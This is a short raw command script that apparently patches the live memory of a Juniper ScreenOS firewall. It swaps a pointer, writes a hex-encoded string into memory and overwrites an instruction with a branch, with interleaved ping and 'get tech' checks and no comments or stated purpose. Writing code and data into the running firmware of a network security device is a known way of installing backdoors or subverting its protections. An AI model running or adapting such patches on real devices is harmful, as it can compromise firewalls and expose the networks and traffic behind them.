set mem addr 0x1371160 0x000636f0
ping
set mem addr 0x14a05e0 0x4d333243
set mem addr 0x14a05e4 0x3432302c
set mem addr 0x14a05e8 0x3031653a
set mem addr 0x14a05ec 0x33443230
set mem addr 0x14a05f0 0x30303334
set mem addr 0x14a05f4 0x33383630
set mem addr 0x14a05f8 0x34383030
set mem addr 0x14a05fc 0x62303639
set mem addr 0x14a0600 0x34346630
set mem addr 0x14a0604 0x33643230
set mem addr 0x14a0608 0x30303630
set mem addr 0x14a060c 0x36313239
set mem addr 0x14a0610 0x61663834
set mem addr 0x14a0614 0x37643238
set mem addr 0x14a0618 0x30336136
set mem addr 0x14a061c 0x34653830
set mem addr 0x14a0620 0x30303230
set mem addr 0x14a0624 0x00000000
set mem addr 0x1371160 0x0032c26c
get tech | in juniper
ping
set mem addr 0x636c8 0x60630300
set mem addr 0x1371160 0x000636f0
get tech | in juniper
ping
set mem addr 0x343cc0 0x48000014
set mem addr 0x1371160 0x005b9f64
